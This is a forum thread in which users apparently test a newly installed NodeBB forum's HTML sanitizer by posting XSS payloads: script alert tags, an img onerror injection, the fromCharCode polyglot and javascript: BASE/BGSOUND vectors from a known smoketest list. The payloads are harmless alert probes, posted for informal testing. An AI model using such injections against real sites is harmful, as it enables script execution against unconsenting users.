JellyPotato (Warning, Should probably stay out.)
-
redacted - bz
-
@Matches
redacted -bzJelly
-
Now for some paging
-
Now for some paging
-
Now for some paging
-
redacted - bz
-
redacted - bz
-
redacted - bz
-
[omitted]
-
Dance for me <script>alert('Maybe')</script><scri%20pt>alert('idk')</script%>>
-
<form action="" method="GET"> <input id="query" name="query" value="Enter query here..." onfocus="this.value=''"> <input id="button" type="submit" value="Search"> </form>
-
Hum @Matches"/><img src=x onerror="
.jpg' />
<script>alert('testing')</script>
<body> Hello {{ USERNAME }}, view your Account. <script> var id = {{ USER_ID }}; alert("Your user ID is: " + id); </script> </body>
-
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
-
=&{()}<BGSOUND »
<BASE » HREF="javascript:alert('XSS' » );//">
SRC="javascript:alert('XSS') »
;">
-
Just so you know, the source code for the HTML sanitizer is here:
-
What's the fun in that?
@ben_lubar Something broke in the big block from http://htmlpurifier.org/live/smoketests/xssAttacks.php - trying to figure out which combination caused it.
-
This post is deleted!
-
Well, it's been hours since we switched to NodeBB and no one has found any obvious XSS exploits. So that beats Discourse.
-
@anonymous234 no, @Maciejasjmj found one.